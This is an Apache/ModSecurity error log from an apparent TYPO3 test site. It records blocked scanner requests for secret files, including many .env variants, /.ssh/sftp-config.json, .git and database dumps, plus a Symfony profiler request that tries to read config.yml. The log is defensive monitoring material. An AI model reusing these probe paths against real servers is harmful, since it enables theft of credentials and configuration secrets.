[Tue Dec 23 21:53:18.067338 2025] [:error] [pid 932700] [client 62.60.131.218:58888] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUsBPom6XiQBwYFycp47UAAAAAk"]
[Tue Dec 23 21:53:18.067482 2025] [:error] [pid 932700] [client 62.60.131.218:58888] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.DS_Store"] [unique_id "aUsBPom6XiQBwYFycp47UAAAAAk"]
[Tue Dec 23 21:53:18.115769 2025] [:error] [pid 920445] [client 62.60.131.218:58962] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env-example"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-example"] [unique_id "aUsBPoNeZfPRtoEjKvE8OgAAAAA"]
[Tue Dec 23 21:53:18.115975 2025] [:error] [pid 920445] [client 62.60.131.218:58962] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-example"] [unique_id "aUsBPoNeZfPRtoEjKvE8OgAAAAA"]
[Tue Dec 23 21:53:18.116119 2025] [:error] [pid 920445] [client 62.60.131.218:58962] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-example"] [unique_id "aUsBPoNeZfPRtoEjKvE8OgAAAAA"]
[Tue Dec 23 21:53:18.124133 2025] [:error] [pid 920449] [client 62.60.131.218:50670] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env-sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-sample"] [unique_id "aUsBPvWEJn4XpeEDU5Z1HwAAAAQ"]
[Tue Dec 23 21:53:18.124317 2025] [:error] [pid 920449] [client 62.60.131.218:50670] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-sample"] [unique_id "aUsBPvWEJn4XpeEDU5Z1HwAAAAQ"]
[Tue Dec 23 21:53:18.124509 2025] [:error] [pid 920449] [client 62.60.131.218:50670] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env-sample"] [unique_id "aUsBPvWEJn4XpeEDU5Z1HwAAAAQ"]
[Tue Dec 23 21:53:18.191308 2025] [:error] [pid 920445] [client 62.60.131.218:53997] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/sftp-config.json" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /sftp-config.json found within REQUEST_FILENAME: /.ssh/sftp-config.json"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/sftp-config.json"] [unique_id "aUsBPoNeZfPRtoEjKvE8OwAAAAA"]
[Tue Dec 23 21:53:18.191440 2025] [:error] [pid 920445] [client 62.60.131.218:53997] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/sftp-config.json"] [unique_id "aUsBPoNeZfPRtoEjKvE8OwAAAAA"]
[Tue Dec 23 21:53:18.191595 2025] [:error] [pid 920445] [client 62.60.131.218:53997] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.ssh/sftp-config.json"] [unique_id "aUsBPoNeZfPRtoEjKvE8OwAAAAA"]
[Tue Dec 23 21:53:18.219783 2025] [authz_core:error] [pid 932702] [client 62.60.131.218:58806] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/var
[Tue Dec 23 21:53:18.232157 2025] [authz_core:error] [pid 932700] [client 62.60.131.218:62267] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Tue Dec 23 21:53:18.236689 2025] [authz_core:error] [pid 922053] [client 62.60.131.218:52487] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Dec 23 21:53:18.242264 2025] [:error] [pid 923967] [client 62.60.131.218:58879] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.openai"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.openai"] [unique_id "aUsBPjJF6yDP_m7KODwAggAAAAc"]
[Tue Dec 23 21:53:18.242462 2025] [:error] [pid 923967] [client 62.60.131.218:58879] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.openai"] [unique_id "aUsBPjJF6yDP_m7KODwAggAAAAc"]
[Tue Dec 23 21:53:18.242606 2025] [:error] [pid 923967] [client 62.60.131.218:58879] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.openai"] [unique_id "aUsBPjJF6yDP_m7KODwAggAAAAc"]
[Tue Dec 23 21:53:25.647700 2025] [:error] [pid 932698] [client 62.60.131.218:52724] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUsBRWp_X6OiVda17XVEFgAAAAg"]
[Tue Dec 23 21:53:25.647909 2025] [:error] [pid 932698] [client 62.60.131.218:52724] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUsBRWp_X6OiVda17XVEFgAAAAg"]
[Tue Dec 23 21:53:25.648059 2025] [:error] [pid 932698] [client 62.60.131.218:52724] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aUsBRWp_X6OiVda17XVEFgAAAAg"]
[Tue Dec 23 21:53:25.677624 2025] [:error] [pid 923967] [client 62.60.131.218:55136] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.brevo"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.brevo"] [unique_id "aUsBRTJF6yDP_m7KODwAgwAAAAc"]
[Tue Dec 23 21:53:25.677810 2025] [:error] [pid 923967] [client 62.60.131.218:55136] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.brevo"] [unique_id "aUsBRTJF6yDP_m7KODwAgwAAAAc"]
[Tue Dec 23 21:53:25.677970 2025] [:error] [pid 923967] [client 62.60.131.218:55136] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.brevo"] [unique_id "aUsBRTJF6yDP_m7KODwAgwAAAAc"]
[Tue Dec 23 21:53:25.683380 2025] [authz_core:error] [pid 920445] [client 62.60.131.218:54778] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/*.sql.gz
[Tue Dec 23 21:53:25.707626 2025] [authz_core:error] [pid 932701] [client 62.60.131.218:59982] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Tue Dec 23 21:53:25.752711 2025] [authz_core:error] [pid 932702] [client 62.60.131.218:51962] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/npm-debug.log
[Tue Dec 23 21:53:25.795610 2025] [:error] [pid 932700] [client 62.60.131.218:64279] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /public/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUsBRYm6XiQBwYFycp47VAAAAAk"]
[Tue Dec 23 21:53:25.795770 2025] [:error] [pid 932700] [client 62.60.131.218:64279] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUsBRYm6XiQBwYFycp47VAAAAAk"]
[Tue Dec 23 21:53:25.795924 2025] [:error] [pid 932700] [client 62.60.131.218:64279] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/public/.env"] [unique_id "aUsBRYm6XiQBwYFycp47VAAAAAk"]
[Tue Dec 23 21:53:25.797726 2025] [:error] [pid 922053] [client 62.60.131.218:63357] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /kyc/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUsBRdrFNKKYU-HtVaVw_gAAAAY"]
[Tue Dec 23 21:53:25.797939 2025] [:error] [pid 922053] [client 62.60.131.218:63357] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUsBRdrFNKKYU-HtVaVw_gAAAAY"]
[Tue Dec 23 21:53:25.798102 2025] [:error] [pid 922053] [client 62.60.131.218:63357] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/kyc/.env"] [unique_id "aUsBRdrFNKKYU-HtVaVw_gAAAAY"]
[Tue Dec 23 21:53:25.822577 2025] [:error] [pid 932701] [client 62.60.131.218:58517] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUsBRSUKWvAZ0lEFftUZmgAAAAo"]
[Tue Dec 23 21:53:25.822739 2025] [:error] [pid 932701] [client 62.60.131.218:58517] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUsBRSUKWvAZ0lEFftUZmgAAAAo"]
[Tue Dec 23 21:53:25.822903 2025] [:error] [pid 932701] [client 62.60.131.218:58517] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aUsBRSUKWvAZ0lEFftUZmgAAAAo"]
[Tue Dec 23 21:53:25.826517 2025] [:error] [pid 920449] [client 62.60.131.218:61616] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUsBRfWEJn4XpeEDU5Z1IgAAAAQ"]
[Tue Dec 23 21:53:25.826685 2025] [:error] [pid 920449] [client 62.60.131.218:61616] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUsBRfWEJn4XpeEDU5Z1IgAAAAQ"]
[Tue Dec 23 21:53:25.826843 2025] [:error] [pid 920449] [client 62.60.131.218:61616] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/laravel/.env"] [unique_id "aUsBRfWEJn4XpeEDU5Z1IgAAAAQ"]
[Tue Dec 23 21:53:25.871597 2025] [:error] [pid 932702] [client 62.60.131.218:54511] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUsBRXBRr9nu5WpwlL24aAAAAAs"]
[Tue Dec 23 21:53:25.871770 2025] [:error] [pid 932702] [client 62.60.131.218:54511] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUsBRXBRr9nu5WpwlL24aAAAAAs"]
[Tue Dec 23 21:53:25.871908 2025] [:error] [pid 932702] [client 62.60.131.218:54511] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aUsBRXBRr9nu5WpwlL24aAAAAAs"]
[Tue Dec 23 21:53:25.897200 2025] [:error] [pid 932698] [client 62.60.131.218:56268] [client 62.60.131.218] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /beta/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aUsBRWp_X6OiVda17XVEGAAAAAg"]
[Tue Dec 23 21:53:25.897348 2025] [:error] [pid 932698] [client 62.60.131.218:56268] [client 62.60.131.218] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aUsBRWp_X6OiVda17XVEGAAAAAg"]
[Tue Dec 23 21:53:25.897490 2025] [:error] [pid 932698] [client 62.60.131.218:56268] [client 62.60.131.218] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/beta/.env"] [unique_id "aUsBRWp_X6OiVda17XVEGAAAAAg"]
[Tue Dec 23 23:15:32.735715 2025] [authz_core:error] [pid 932700] [client 62.60.131.162:62661] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Wed Dec 24 03:10:26.715034 2025] [:error] [pid 942101] [client 158.51.121.183:14946] [client 158.51.121.183] ModSecurity: Warning. Matched phrase "config.yml" at ARGS:file. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "96"] [id "930120"] [msg "OS File Access Attempt"] [data "Matched Data: config.yml found within ARGS:file: app/config/config.yml"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/app_dev.php/_profiler/open"] [unique_id "aUtLko3b3LRkWYPRjITTbQAAAAI"]
